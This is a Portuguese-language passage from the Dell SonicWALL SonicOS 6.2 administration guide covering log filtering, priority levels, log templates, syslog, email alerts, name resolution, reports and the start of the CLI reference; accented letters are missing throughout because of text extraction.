evento existente que pode ser selecionado na tabela Monitor de log. Na Exibio de filtros,
s possvel selecionar uma combinao de Categoria/Prioridade por vez. No modo normal,
possvel selecionar vrias categorias ao mesmo tempo.
possvel configurar vrias exibies de filtros para as categorias usando a barra de filtros.
Para configurar uma exibio de filtros:
Etapa 1 Acesse a pgina Log > Monitor.

Etapa 2 Clique no sinal de + ao lado da barra Exibio de filtros.
A caixa de dilogo Exibio de filtros exibida.
Etapa 3 No menu Prioridade, selecione a prioridade desejada.

Etapa 4 No menu Categoria, selecione a categoria desejada.
Etapa 5 No menu Interface de origem, selecione a interface desejada.
Etapa 6 No menu Interface de destino, selecione a interface desejada.
Etapa 7 Na caixa IP de origem, digite o endereo IP da interface de origem.
Etapa 8 Na caixa IP de destino, digite o endereo IP da interface de destino.
A tabela Monitor de log exibe os resultados filtrados.

Mensagens de eventos de log
Para obter um guia de referncia completo das mensagens de eventos de log, consulte o Guia
de Referncia dos Eventos de log do SonicOS em www.sonicwall.com/support.html.
Persistncia de log
Os modelos TZ de extremidade inferior podem armazenar at 800 entradas de eventos no
buffer de log. Todos os outros modelos da verso 6.2 do Dell/Dell SonicWALL podem
armazenar de 1.000 a 10.000 entradas de eventos no buffer de log.
Quando o log estiver cheio, uma ou mais entradas de log mais antigas so excludas. Tambm
possvel clicar no boto Limpar todos os logs para limpar todas as entradas do log.
O envio por e-mail oferece uma verso simples do registro em log de persistncia e o GMS
fornece um mtodo mais confivel e escalvel.
Ao oferecer ao administrador a opo para fornecer logs como texto simples ou HTML, o
administrador possui um mtodo fcil para revisar e reproduzir eventos registrados.
GMS
Para possibilitar a capacidade de identificar e exibir os eventos em toda a empresa, ser
necessria a atualizao do GMS. Os eventos de "contedo interessante" especficos para o
dispositivo no console do GMS so exibidos na pgina Relatrios > Busca do Visualizador
de logs, mas tambm podem ser encontrados em vrios relatrios, como Principais Invases
ao Longo do Tempo.

Captulo 74
Definindo configuraes de log
Log > Configuraes

Esta seo fornece tarefas de configurao para permitir a categorizao e personalizao das
funes de registro em log no seu dispositivo de segurana Dell SonicWALL para diagnstico
e resoluo de problemas.
A coluna Categoria da tabela Monitor de logs tem trs nveis: categoria, grupo e evento. O
primeiro nvel da estrutura da rvore a categoria. O segundo nvel o grupo. O terceiro nvel
o evento. Clicar no pequeno tringulo preto expandir ou recolher o contedo da categoria
ou do grupo.
Definindo configuraes de log | 1329

No grfico a seguir, Sistema est no primeiro nvel categoria. SNMP est no segundo nvel
grupo. Descarte de Pacotes do SNMP e os itens abaixo dele esto no mesmo nvel, o terceiro
nvel evento.
Gravidade/prioridade do log
Esta seo fornece informaes sobre como configurar o nvel de prioridade de mensagens de
log que so capturadas e as mensagens de alerta correspondentes que so enviadas por e-
mail para notificao.
Nota Os E-mails de alerta sero enviados quando a opo Enviar log para endereos de e-mail
e a opo Enviar alertas para endereos de e-mail forem configuradas na pgina Log >
Automao.

Configurando o nvel de registro em log
O Nvel de registro em log permite que o administrador do firewall filtre eventos por
prioridade. Eventos com prioridade igual ou mais alta so transmitidos. Eventos com uma
prioridade mais baixa so descartados. Isso permite que o administrador do firewall filtre as
prioridades de nvel mais baixo para evitar que elas sejam registradas no sistema.
Na pgina Log > Configuraes, possvel definir o nvel de registro em log da l inha de
base que ser exibido na pgina Monitor de logs. Os seguintes nveis de registro em log esto
disponveis para seleo:
Emergncia
Alerta
Crtico
Erro
Aviso
Aviso
Informar
Depurar
Para definir o nvel de registro em log:
Etapa 1 Acesse a pgina Log > Configuraes.

Etapa 2 No menu Nvel de registro em log, selecione o nvel de registro em log desejado.
Todos os eventos com uma prioridade mais alta do que a entrada selecionada so registrados.
Por exemplo, se voc selecionar erro como o nvel de registro em log, todas as mensagens
marcadas como erro, bem como todas as mensagens com uma prioridade mais alta, como
crtico, alerta e emergncia, tambm sero exibidas.
Para exibir todos os eventos:

Selecione Depurao como o nvel de registro em log.

Editando os Atributos das categorias globais
Clicar no boto da ferramenta prximo caixa Nvel de registro em log iniciar a caixa de
dilogo Editar atributos de todas as categorias. Esta caixa de dilogo permite que voc
defina os atributos para todos os eventos em todas as categorias ou em todos os grupos.
possvel definir a prioridade de cada categoria ou grupo, e todos os eventos nessa categoria
ou grupo tero essa mesma prioridade. Tambm possvel especificar os Endereos de e-mail
para os quais os logs e alertas podem ser enviados.
As caixas Intervalo do filtro de redundncia permitem que voc digite os intervalos de tempo
(em segundos) para evitar a duplicao de uma mensagem de log dentro de um intervalo. O
intervalo para esses intervalos de 0 a 86.400 segundos. Para as mensagens do Syslog, o
intervalo definido em 90 segundos. Para as mensagens de alerta, o intervalo definido em
900 segundos.
Para editar os atributos de categorias globalmente:
Etapa 1 Acesse a pgina Log > Configuraes.

Etapa 2 Clique no boto da ferramenta.

A caixa de dilogo Editar atributos para todas as categorias exibida.
Etapa 3 Na lista de menu Prioridade de evento, selecione a prioridade que desejar.

Em Habilitar Intervalo do filtro de redundncia:
Etapa 4 Se desejar exibir os eventos de log no Monitor de logs, selecione o boto Habilitar para exibir
a opo Exibir eventos no Monitor de logs.
Nota Os botes Habilitar ficam verdes quando esto selecionados, brancos quando no
esto selecionados e semisslidos quando no so alterados. Quando as caixas
informam "Vrios valores", os valores tambm no so alterados.
Etapa 5 Na caixa Exibir eventos no Monitor de logs, digite o nmero de segundos para que o
Monitor de logs atualize seus dados. O intervalo de 0 a 86.400.
Etapa 6 Se desejar enviar eventos como alertas de e-mail, selecione o boto Habilitar para exibir a
opo Enviar eventos como alertas de e-mail.
Etapa 7 Na caixa Enviar eventos como alertas de e-mail, digite o nmero de segundos para que o
Monitor de logs atualize seus dados. O intervalo de 0 a 86.400.
Etapa 8 Se desejar reportar eventos pelo Syslog, selecione o boto Habilitar para exibir a opo
Reportar eventos pelo Syslog.
Etapa 9 Na caixa Reportar eventos pelo Syslog, digite o nmero de segundos para que o Monitor de
logs atualize seus dados. O intervalo de 0 a 86.400.
Etapa 10 Se desejar enviar o log de eventos globais por e-mail, digite o Endereo de e-mail na caixa
Enviar resumo de logs para endereo de e-mail.
Etapa 11 Se desejar continuar usando esse Endereo de e-mail mesmo quando voc alterar outros
valores nesta caixa de dilogo, selecione a opo Deixar inalterado.

Etapa 12 Se desejar usar o mesmo Endereo de e-mail que est inserido na pgina Log > Automao
para enviar o log de eventos globais, selecione a opo Usar endereo de e-mail da
automao padro.
Etapa 13 Se desejar enviar alertas por e-mail com base nas configuraes globais desta caixa de
dilogo, digite o Endereo de e-mail na caixa Enviar alertas para endereo de e-mail.
Etapa 14 Se desejar continuar usando esse Endereo de e-mail mesmo quando voc alterar outros
valores nesta caixa de dilogo, selecione a opo Deixar inalterado.
Etapa 15 Se desejar usar o mesmo Endereo de e-mail que est inserido na pgina Log > Automao
para enviar alertas globais, selecione a opo Usar endereo de e-mail da automao
padro.
Etapa 16 Se desejar usar uma cor especfica para o log de eventos globais, desmarque a opo Deixar
inalterado. A matriz de seleo de cores exibida.
Etapa 17 Selecione a cor desejada.
Configurando Atributos de categoria em colunas

Na pgina Log > Configuraes, as colunas mostram as definies de configurao para cada
linha.
Somente os itens no nvel de eventos podem ser configurados nas linhas e colunas. Os itens
no nvel de grupo e de categoria apenas exibem as informaes de configurao. Para
configurar os itens no nvel de grupo ou de categoria, necessrio usar as caixas de dilogos
Editar grupos de log ou Editar categorias de log que so exibidas ao clicar no boto
Configurar no final da linha. Tambm possvel configurar os eventos clicando no boto
Configurar, que inicia a caixa de dilogo Editar eventos de log.

Coluna Cores
A coluna Cores mostra a cor com a qual o evento, grupo ou categoria destacado na tabela
Monitor de logs.
Coluna ID
A coluna ID mostra o nmero de ID do evento.
Coluna Prioridade
A coluna Prioridade mostra a gravidade ou a prioridade de uma categoria, grupo ou evento.
Para os eventos, um menu que lista as prioridades selecionveis fornecido. Para as
categorias e grupos, as prioridades so listadas na caixa de dilogo ao clicar no boto
Configurar no final da linha.
As prioridades disponveis so:
Emergncia
Alerta
Crtico
Erro
Aviso
Aviso
Informar
Depurar
Coluna GUI
A coluna GUI mostra as caixas de seleo que indicam se este evento exibido no Monitor de
logs. Para os eventos, possvel mostrar ou ocultar o evento marcando ou desmarcando a
caixa de seleo na coluna. Para as categorias e grupos, use a caixa de dilogo Configurar.
Coluna Alerta
A coluna Alerta mostra as caixas de seleo que indicam se uma mensagem de Alerta ser
enviada para este evento, grupo ou categoria.
Coluna Syslog
A coluna Syslog mostra as caixas de seleo que indicam se o evento, grupo ou categoria
sero enviados para um servidor do Syslog.
Coluna E-mail
A coluna E-mail mostra as caixas de seleo que indicam se o log ser enviado por e-mail para
o endereo configurado. Para os eventos, essas caixas so configurveis na coluna. Para as
categorias e grupos, o E-mail configurado nas caixas de dilogos Editar grupo de log ou Editar
categoria de log que so exibidas ao clicar no boto Configurar no final da linha.
Coluna Contagem de eventos

A coluna Contagem de eventos mostra o nmero de vezes que o evento ocorreu. Para os
grupos e categorias, ele mostra o nmero de vezes que este evento ocorreu para esse grupo
ou categoria.

Botes Configurar e Redefinir
Os botes Configurar e Redefinir so exibidos no final de cada linha.
Boto Configurar
O boto Configurar inicia a caixa de dilogo Editar evento de log, Editar grupo de log ou
Editar categoria de log. possvel configurar todos os atributos de um evento, grupo ou
categoria.
Boto Redefinir
O boto Redefinir redefine o contador de eventos de um evento, grupo ou categoria, e os
contadores de eventos de nveis superiores so recalculados.
Botes da linha superior

Na tabela Log > Configuraes, a linha superior apresenta os seguintes botes:
Salvar o modelo de log
Importar o modelo de log
Redefinir a contagem de eventos

Salvar como modelo
O boto Salvar em modelo exporta as Configuraes de log configuradas atuais para o

modelo Personalizado. Ele tambm permite que voc insira uma descrio para o modelo
Personalizado.
Existem quatro modelos de Configuraes de log: Padro, Mnimo, Analisador/Ponto de Vista/
GMS e Personalizado. Apenas o modelo Personalizado pode ser modificado e salvo, e s h
um nico modelo personalizado. Cada vez que o modelo personalizado for salvo, o modelo
personalizado antigo ser substitudo.

Importar o modelo de log
O boto Importar modelo de registro em log permite selecionar e importar um dos quatro
modelos a seguir:
Modelo Padro
Modelo Mnimo
Modelo Analisador/Ponto de Vista/GMS
Modelo Personalizado
Nota Os modelos Padro, Mnimo e Analisador/Ponto de Vista/GMS so definidos na fbrica.
Modelo Padro
O modelo Padro restaura todas as configuraes de eventos de log para os valores padro
da Dell/Dell SonicWALL.
Isto inclui as seguintes configuraes para cada evento de log:
Nvel de prioridade
GUI
Alerta
Syslog
Filtro de e-mail
Intervalo do filtro
Endereo de e-mail:
Endereo de e-mail de alerta
Cor

Modelo Mnimo
O modelo mnimo mantm os logs gerados a um nvel mnimo, ao mesmo tempo que continua
a fornecer informaes suficientes sobre os eventos mais importantes do firewall. O modelo
mnimo desativa os filtros no crticos: GUI, Alerta, Syslog e E-mail.
Modelo Analisador/Ponto de Vista/GMS

Este modelo configurado na fbrica para garantir que o firewall funcione corretamente com
o servidor do Analisador/Ponto de Vista/GMS. Todos os eventos relacionados so
configurados para atender aos requisitos do servidor.
Todas as configuraes esto limitadas ao intervalo do filtro/filtro do Syslog. Este modelo afeta
apenas o intervalo do filtro/filtro do Syslog.
Modelo Personalizado
O modelo Personalizado definido pelas Configuraes de log configuradas atuais e pode ser
modificado pelo administrador do firewall. O boto Salvar em modelo exporta as
Configuraes de log configuradas atuais para o modelo Personalizado. Ele tambm permite
que voc insira uma descrio para o modelo Personalizado.
Redefinir a contagem de eventos
O boto Redefinir contagem de eventos define todos os contadores de eventos para zero (0).
Aplicar
O boto Aplicar aplica as configuraes de log atualmente importadas ao Monitor de logs.

Captulo 75
Definir configuraes de syslog
Log > Syslog

Alm do log de eventos padro, o firewall pode enviar um log detalhado para um servidor
syslog externo. O SonicWALL Syslog captura toda a atividade de log e inclui cada origem de
conexo e endereo IP de destino, servio de IP e o nmero de bytes transferidos.
Os Syslog Analyzers, como SonicWALL Analyzer, WebTrends ou ArcSight, podem ser usados
para classificar, analisar e representar em grfico os dados de syslog. As mensagens do
firewall so ento enviadas para o(s) servidor(es) syslog. At sete (7) servidores syslog podem
ser conectados ao firewall.
Definir configuraes de syslog | 1341

Configuraes de syslog
A pgina Log > Syslog permite que voc configure as vrias configuraes que deseja quando
enviar o log para um servidor syslog. Voc pode escolher o recurso de syslog e o formato de
syslog que desejar.
Nota O SonicWALL Syslog requer um servidor externo executando um daemon syslog em uma
porta UDP. A porta padro a porta 514 UDP, mas voc pode escolher uma porta diferente.
Nota Consulte RCF 3164 O protocolo syslog BSD para obter mais informaes.
Definir configuraes de syslog

Para definir as configuraes de Syslog no seu firewall:
Etapa 1 Navegue at a pgina Log > Syslog.

Etapa 2 No ttulo Configuraes de syslog, na lista de menu Recurso de syslog, selecione o
Recurso de syslog desejado.
Etapa 3 (Opcional) Se voc desejar substituir as configuraes de Syslog e usar as configuraes de
software de gerao de relatrios, selecione a opo Substituir configuraes de syslog
com configuraes de software de relatrio.
Nota Quando o modo ViewPoint ou o modo Analyzer est habilitado, a opo Substituir
configuraes de syslog com configuraes de software de relatrio selecionada
automaticamente. Quando esta opo estiver marcada, o formato de syslog sempre
redefinido para o formato Padro.
Etapa 4 Na lista de menu Formato de syslog, selecione o formato de syslog que desejar.
Os seguintes formatos de syslog esto listados:
Padro use o formato de syslog SonicWALL padro.
WebTrends use o formato de syslog WebTrends. Voc deve ter o software
WebTrends instalado no seu sistema.
Syslog avanado Use o formato de Syslog avanado do Dell SonicWALL.
ArcSight use o formato de syslog ArcSight. O servidor syslog deve ser configurado
com o aplicativo ArcSight Logger para decodificar as mensagens ArcSight.
Ao selecionar Syslog avanado ou Arcsight, o cone de configurao torna-se ativo. Clicar

no cone de configurao inicia uma janela de configurao, na qual possvel selecionar as
definies especficas que voc deseja registrar.

Etapa 5 (Opcional) Se voc selecionou Syslog avanado, clique no cone de configurao .
A caixa de dilogo de configurao Syslog avanado exibida.
Etapa 6 (Opcional) Se voc selecionou Syslog avanado, clique no cone de configurao .
A caixa de dilogo de configurao Syslog avanado exibida.
Etapa 7 (Opcional ) Selecione as opes de Syslog avanadoque voc deseja registrar.

Etapa 8 (Opcional) Se voc selecionou ArcSight, clique no cone de configurao .
A caixa de dilogo de configurao do ArcSight exibida.
Etapa 9 (Opcional ) Selecione as opes de ArcSightque voc deseja registrar.

Etapa 10 Na caixa ID do Syslog, digite o ID do Syslog desejado.
Um campo ID do Syslog includo em todas as mensagens geradas pelo Syslog, prefixadas
por "id= ". Assim, para o valor padro, firewall, todas as mensagens do Syslog incluem
"id=firewall". O campo ID do Syslog desabilitado quando a opo Substituir configuraes
do Syslog pelas configuraes do software de relatrio estiver habilitada.
Etapa 11 (Opcional) Selecione Habilitar limite de taxa de eventos se desejar.
Este controle permite habilitar o limite de taxa de eventos para impedir a sobrecarga dos
mecanismos de registro internos ou externos por eventos de log.
Etapa 12 (Opcional) Selecione Habilitar limite de taxa de dados se desejar.
Este controle permite habilitar o limite de taxa de dados para impedir a sobrecarga dos
mecanismos de registro internos ou externos por eventos de log.
Etapa 13 (Opcional) Selecione a opo Habilitar Imposio do NDPP no servidor do Syslog se
desejar a imposio do NDPP em seu servidor do Syslog. Consulte NDPP na pgina 138.

Adicionar um servidor syslog
Para adicionar um servidor Syslog ao firewall.
Etapa 1 Navegue at a pgina Log > Syslog.

No ttulo Servidores syslog:
Etapa 2 Clique em Adicionar. A caixa de dilogo Adicionar servidor syslog ser exibida.
Etapa 3 Na caixa Nome ou endereo IP, digite o nome do servidor ou o endereo IP do servidor syslog.
As mensagens do firewall so ento enviadas para os servidores.
Etapa 4 Se seu servidor syslog no usar porta padro 514, digite o nmero da porta apropriada na caixa
Nmero da porta.

Captulo 76
Configurar automao de log
Log > Automao

A pgina Log > Automao inclui definies para configurar o SonicWALL para enviar
arquivos de log usando E-mail e definindo configuraes de servidor de e-mail.
Configurar automao de log | 1347

Automao de log de e-mail
Enviar log para endereo de e-mail insira seu endereo de e-mail
(username@mydomain.com) neste campo para receber o log de eventos por e-mail. Uma
vez enviado, o log excludo da memria do SonicWALL. Se este campo for deixado em
branco, o log no ser enviado por e-mail.
Enviar alertas para endereo de e-mail insira seu endereo de e-mail
(username@mydomain.com) no campo Enviar alertas para de forma a informado
imediatamente por e-mail da ocorrncia de ataques ou erros do sistema. Digite um
endereo de e-mail padro ou um servio de paginao de e-mail. Se este campo for
deixado em branco, as mensagens de alerta de e-mail no sero enviadas.
Enviar log determina a frequncia de envio de arquivos de log. As opes so Quando
cheio, Semanalmente ou Diariamente. Se a opo Semanalmente ou Diariamente for
selecionada, selecione o dia da semana em que o log enviado no menu a cada e a hora
do dia no formato de 24 horas no campo s.
Formato de e-mail especifica se os e-mails de log sero enviados no formato de Texto
simples ou HTML.
Notificao por e-mail da verificao de integridade

O painel Notificao por e-mail da verificao de integridade permite que voc crie uma
notificao por e-mail predefinida com assunto e corpo definidos nos momentos especificados
pela programao selecionada.
Para configurar uma Notificao por e-mail da verificao de integridade:
Etapa 1 No menu Programao de e-mail, selecione a programao desejada ou Criar uma nova
programao ou selecione Desabilitada.
Etapa 2 Na caixa Enviar para endereo de e-mai, insira o endereo de e-mail do(s) destinatrio(s)
para notificao.
Etapa 3 Na caixa Assunto do e-mail, insira o assunto do e-mail.
Etapa 4 Na caixa Corpo do e-mail, insira o corpo do e-mail.

Configuraes do servidor de e-mail
As configuraes do servidor de e-mail permitem que voc especifique o nome ou endereo
IP de seu servidor de e-mail, o endereo de e-mail de origem e o mtodo de autenticao.
Servidor de e-mail (nome ou endereo IP) digite o endereo IP ou o FQDN do servidor

de e-mail usado para enviar e-mails de log neste campo.
Endereo de e-mail de origem digite o endereo de e-mail que voc deseja exibir no
campo De da mensagem.
Mtodo de autenticao voc pode usar o item padro Nenhum ou selecionar POP
antes de SMTP.
Nota Se o Servidor de e-mail (nome ou endereo IP) for deixado em branco, as mensagens de
log e de alerta no sero enviadas.

Solera Capture Stack
A Solera Networks produz uma srie de dispositivos de diversas capacidades e velocidades
projetados para capturar, arquivar e gerar novamente trfego de rede. O Network Packet
Capture System (NPCS) da Solera Networks fornece utilitrios que permitem que os dados
capturados sejam acessados em reproduo sequencial de tempo, ou seja, a anlise de dados
capturados pode ser realizada em uma rede em tempo real via NPCS enquanto o dispositivo
est ativamente capturando e arquivando dados.
Para configurar seu dispositivo SonicWALL com Solera:
Etapa 1 Selecione a opo Habilitar integrao de Solera Capture Stack.

Etapa 2 Configure as seguintes opes:
Servidor selecione o host para o servidor Solera. Voc pode criar dinamicamente o host
selecionando Criar novo host...
Protocolo selecione HTTP ou HTTPS.
Porta especifique o nmero da porta para conexo ao servidor Solera.
URL de base DeepSee - define o formato do URL de base para o caminho DeepSee. No
URL real, os tokens especiais so substitudos pelos valores reais.
URL de base PCAP define o formato do URL de base para o caminho PCAP. No URL
real, os tokens especiais so substitudos pelos valores reais.

Os tokens a seguir podem ser usados nos campos URL de base DeepSee e URL de base
PCAP:
$host nome do servidor ou endereo IP com os dados
$port nmero da porta HTTP/HTTPS em que o servidor est escutando
$usr nome do usurio para autenticao
$pwd senha para autenticao
$start data e hora de incio
$stop data e hora de fim
$ipproto protocolo IP
$scrip endereo IP de origem
$dstip endereo IP de destino
$srcport porta de origem
$dstport porta de destino

Captulo 77
Configurar resoluo de nome
Log > Resoluo de nome
Timesaver A pgina Log > Resoluo de nome inclui definies para configurar os servidores de
nome usados para resolver endereos IP e nomes de servidor nos relatrios de log.
O dispositivo de segurana de rede Dell SonicWALL usa um servidor DNS ou NetBIOS para
resolver todos os endereos IP nos relatrios de log em nomes de servidor. Ele armazena os
pares de nomes/endereos em cache, para ajudar em pesquisas futuras. Voc pode limpar o
cache clicando em Redefinir cache de nome na parte superior da pgina Log > Resoluo
de nome.
Configurar resoluo de nome | 1353

Selecionar configuraes de resoluo de nome
O dispositivo de firewall pode usar DNS, NetBIOS ou ambos para resolver endereos IP e
nomes de servidor.
Na lista Mtodo de resoluo de nome, selecione:
Nenhum: O dispositivo de segurana no tentar resolver nomes e endereos IP nos
relatrios de log.
DNS: O dispositivo de segurana usar o servidor DNS que voc especificar para resolver
nomes e endereos.
NetBIOS: O dispositivo de segurana usar o NetBIOS para resolver nomes e endereos.
Se voc selecionar NetBIOS, no sero necessrias configuraes adicionais.
DNS, em seguida, NetBIOS: O dispositivo de segurana usar primeiro o servidor DNS
que voc especificar para resolver nomes e endereos. Se ele no conseguir resolver o
nome, tentar novamente com NetBIOS.
Especificar o servidor DNS

Voc pode optar por especificar servidores DNS ou usar os mesmos servidores como a zona
de WAN.
Etapa 1 Selecione Especificar servidores DNS manualmente ou Herdar configuraes de DNS

dinamicamente da zona de WAN. A segunda opo selecionada por padro.
Etapa 2 Se voc selecionou especificar um servidor DNS, digite o endereo IP para, pelo menos, um
servidor DNS na sua rede. Voc pode inserir at trs servidores.
Etapa 3 Clique em Aceitar no canto superior esquerdo da pgina Log > Resoluo de nome para que
as suas alteraes tenham efeito.

Captulo 78
Gerar relatrios de registros
Log > Relatrios

O firewall pode executar uma anlise do log de eventos para mostrar os 25 principais sites da
Web acessados com mais frequncia, os 25 principais usurios de largura de banda por
endereo IP e os 25 principais servios que consomem muita largura de banda. Voc pode
gerar esses relatrios na pgina Log > Relatrios.
Nota O SonicWALL ViewPoint oferece uma soluo abrangente de gerao de relatrios

baseada na Web para firewalls. Para obter mais informaes sobre o SonicWALL
ViewPoint, acesse http://www.sonicwall.com
Gerar relatrios de registros | 1355

Coleta de dados
A janela Relatrios inclui as seguintes funes e os seguintes comandos:
Seo Coleta de dados
Clique em Iniciar coleta de dados para iniciar a anlise de log. Quando anlise de log
habilitada, o rtulo do boto muda para Parar coleta de dados.
Seo Visualizar dados
Clique em Redefinir dados para limpar as estatsticas de relatrio e iniciar um novo
perodo de amostra. O perodo de amostra tambm redefinido quando a coleta de dados
interrompida ou iniciada e quando o firewall reiniciado.
Visualizar dados
Selecione o relatrio desejado no menu Visualizao do relatrio. As opes so Acertos
de site, Uso de largura de banda por endereo IP e Uso de largura de banda por servio.
Esses relatrios so explicados abaixo. Clique em Atualizar dados para atualizar o relatrio.
O perodo de tempo analisado pelo relatrio exibido em Perodo de amostra atual.
Acertos de site
A seleo de Acertos de site no menu Visualizao do relatrio exibe uma tabela mostrando
os URLs dos 25 sites da Web acessados com mais frequncia e o nmero de acertos para um
site durante o perodo de amostra atual.
O relatrio Acertos de site garante que a maioria do acesso Web est relacionada com sites
da Web apropriados. Se sites de lazer, esportes ou outros sites inadequados aparecerem no
relatrio Acertos de site, voc pode optar por bloque-los. Para obter informaes sobre
bloqueio de sites da Web inadequados, consulte .
Clique no nome de um site da Web para abrir esse site em uma nova janela.
Uso de largura de banda por endereo IP

A seleo de Uso de largura de banda por endereo IP no menu Visualizao do relatrio
exibe uma tabela que mostra o endereo IP dos 25 principais usurios de largura de banda da
Internet e o nmero de megabytes transmitidos durante o perodo de amostra atual.
Uso de largura de banda por servio

A seleo de Uso de largura de banda por servio no menu Visualizao do relatrio exibe
uma tabela que mostra o nome dos 25 principais servios de Internet, como HTTP, FTP,
RealAudio, etc., e o nmero de megabytes recebidos do servio durante o perodo de amostra
atual.
O relatrio Uso de largura de banda por servio mostra se os servios que esto sendo
usados so apropriados para a sua organizao. Se os servios como transmisses de vdeo
ou push esto consumindo uma grande parte da largura de banda disponvel, voc pode optar
por bloquear esses servios.

Captulo 79
Configurar o analisador de log
Log > Analisador de log

A pgina Log > Analisador de log permite que voc adicione o endereo IP e o nmero de
porta de seu servidor do Analyzer.
Configurar o analisador de log | 1357

Para adicionar uma conexo de servidor de analisador ao seu firewall:
Etapa 1 V para a pgina Log > Analisador de log.

A caixa de dilogo Adicionar servidor syslog ser exibida.
Etapa 3 Na lista de menu Nome ou endereo IP, selecione o item que voc deseja ou
selecione Criar novo objeto de endereo.
Etapa 4 Na caixa Porta digite o nmero da porta do analisador.

(Opcional) Para se conectar ao seu analisador por meio de um tnel de VPN:
Etapa 5 Em Vincular tnel de VPN e criar poltica de monitor de rede no modo NDPP,
na caixa Interface local, escolha Selecionar uma interface.
Etapa 6 Na caixa Interface de sada, escolha Selecione uma interface de tnel.
Nota Para obter informaes sobre como configurar e gerenciar seu Analyzer, consulte o guia de
usurio do Analyzer.

Parte 22
Anexos
| 1359
Apndice A
Guia de referncia de CLI
Guia de CLI
A interface de linha de comando empresarial (E-CLI Enterprise Command Line Interface) do
SonicOS oferece uma forma poderosa e concisa para configurar dispositivos de segurana de
rede Dell SonicWALL sem usar a interface de gerenciamento do SonicOS com base na Web.
Voc pode usar os comandos da CLI individualmente na linha de comando ou em scripts para
automatizao de tarefas de configurao.
Este apndice contm uma lista categorizada de comandos da interface de linha de comando
(CLI) para o firmware SonicOS 6.2. Cada comando descrito e, onde apropriado, includo
um exemplo de seu uso.
Para obter uma lista dos comandos da interface de linha de comando (CLI) para o firmware
SonicOS 6.2, consulte o Guia de referncia de CLI do SonicOS 6.2.
Esta Introduo contm as seguintes sees:
Convenes do texto na pgina 1361
Especificao do formato de dados de entrada na pgina 1362
Especificao de prompts da CLI na pgina 1362
Recursos de edio e concluso na pgina 1362
Hierarquia de comandos na pgina 1364
Senhas na pgina 1364
Redefinio de fbrica na pgina 1364
Fazer login na CLI do SonicOS na pgina 1366
Configurar o dispositivo de segurana de rede Dell SonicWALL na pgina 1366
Exemplo: Configurar uma VPN site a site usando a CLI na pgina 1370
Nota A referncia completa de comandos de CLI da SonicWALL est includa na ajuda on-line do
SonicOS. Para acessar a referncia de comandos, clique no boto Ajuda na GUI do
SonicOS e, em seguida, navegue at Apndices > Guia de CLI.
Convenes do texto
O texto em negrito indica um comando executado por interao com a interface do usurio.
O texto em Courier e negrito indica comandos e texto inseridos utilizando a CLI.
O texto em itlico indica a primeira ocorrncia de um novo termo, bem como o ttulo de um livro
e tambm texto realado. Neste resumo de comandos, os itens apresentados em itlico
representam informaes especficas do usurio.
Os itens entre colchetes angulares ("< >") so informaes necessrias.
Os itens entre colchetes ("[ ]") so informaes opcionais.
Os itens separados por uma barra vertical ("|") so opes. Voc pode selecionar qualquer um
deles.
| 1361
Nota Embora a cadeia de comandos possa ser exibida em vrias linhas neste guia, ela deve ser
inserida em uma nica linha sem novas linhas, exceto no fim do comando completo.
Especificao do formato de dados de entrada

A tabela abaixo descreve os formatos de dados aceitos para a maioria dos comandos. H
representa um ou mais dgitos hexadecimais (09 e AF). D representa um ou mais dgitos
decimais.
Tabela 12 Formatos de dados de entrada
Dados Formato dos dados

Endereo MAC HH:HH:HH:HH:HH:HH
Endereo MAC HHHH.HHHH.HHHH
Endereo IP D.D.D.D
Endereo IP 0xHHHHHHHH
Valores inteiros D
Valores inteiros 0xH
Intervalo de inteiros D-D
Especificao de prompts da CLI

O nome do firewall, configurvel atravs da interface de usurio da Web do SonicOS na pgina
Sistema > Administrao, usado nos prompts da CLI, em vez do nome genrico do produto,
como NSA3600 ou SM9600.
Isso permite que o administrador identifique mais facilmente qual o firewall que est sendo
gerenciado e quais os firewalls que esto sendo usados por departamentos especficos de
uma empresa. Por exemplo, o administrador pode atribuir um nome a vrios NSA3600s, como
Marketing, Publicaes tcnicas, Engenharia, Testes, etc.
Se nenhum nome do firewall for configurado, o padro o nmero de srie ou o endereo MAC
do dispositivo, resultando em um prompt como:
C0EAE4599008>
Nos exemplos neste documento, usamos NSA3600 como o nome configurado do dispositivo
e, consequentemente, como o prompt nos exemplos.
Recursos de edio e concluso

Voc pode usar combinaes de teclas individuais com a tecla control para ajud-lo com a CLI.
A tabela abaixo descreve as funes da combinao de uma tecla com a tecla control.

Tabela 13 Referncia da tecla
Tecla(s) Funo
Tab Completa a palavra atual
? Exibe possveis concluses do comando
CTRL+A Move o cursor para o incio da linha de comando
CTRL+B Move o cursor para o caractere anterior
CTRL+C Sai do assistente de incio rpido a qualquer
momento
CTRL+E Move o cursor para o fim da linha de comando
CTRL+F Move o cursor para o caractere seguinte
CTRL+K Apaga caracteres desde o cursor at o fim da linha
CTRL+N Exibe o comando seguinte no histrico de
comandos
CTRL+P Exibe o comando anterior no histrico de comandos
CTRL+W Apaga a palavra anterior
Seta para a esquerda Move o cursor para o caractere anterior
Seta para a direita Move o cursor para o caractere seguinte
Seta para cima Exibe o comando anterior no histrico de comandos
Seta para baixo Exibe o comando seguinte no histrico de
comandos
A maioria dos comandos de configurao precisa completar todos os campos no comando.

Para comandos com vrios comandos de concluso possveis, a tecla Tab ou ? exibe todas as
opes.
myDevice> mostrar [TAB]
alertas interface rede suporte tcnico
arp log processos tsr
filtro de contedo memria rota gerenciamento da Web
cpu mensagens segurana- zona

servios
dispositivo nat status zones
gms netstat sistema
A tecla Tab tambm pode ser usada para terminar um comando se este for identificado
exclusivamente por entrada do usurio.
myDevice> show al [TAB]
exibe
myDevice> mostrar alertas
Alm disso, os comandos podem ser abreviados se os comandos parciais forem nicos. O
seguinte texto:
| 1363
myDevice> sho int inf
uma abreviao aceitvel para
myDevice> mostrar informaes da interface
Hierarquia de comandos
O gerenciador de configuraes da CLI permite que voc controle o hardware e o firmware do
dispositivo atravs de um sistema separado de modo e submodo. Os comandos do dispositivo
adaptam-se hierarquia lgica exibida abaixo.
Para configurar itens em um submodo, ative o submodo inserindo um comando no modo acima
dele.
Por exemplo, para definir a velocidade da interface LAN padro ou duplex, primeiro voc deve
inserir configure e, em seguida, interface x0 lan. Para retornar ao modo de
configurao superior, basta inserir end ou finished.
Segurana da configurao
Os dispositivos de segurana da Internet SonicWALL permitem uma configurao fcil e
flexvel sem comprometer a segurana da sua configurao ou da sua rede.
Senhas
A CLI do SonicWALL usa atualmente a senha do administrador para obter acesso. Os
dispositivos SonicWALL so enviados com uma senha padro de senha. A configurao de
senhas importante para acessar o SonicWALL e configur-lo em uma rede.
Redefinio de fbrica
Se voc no conseguir estabelecer conexo com seu dispositivo na rede, poder usar o
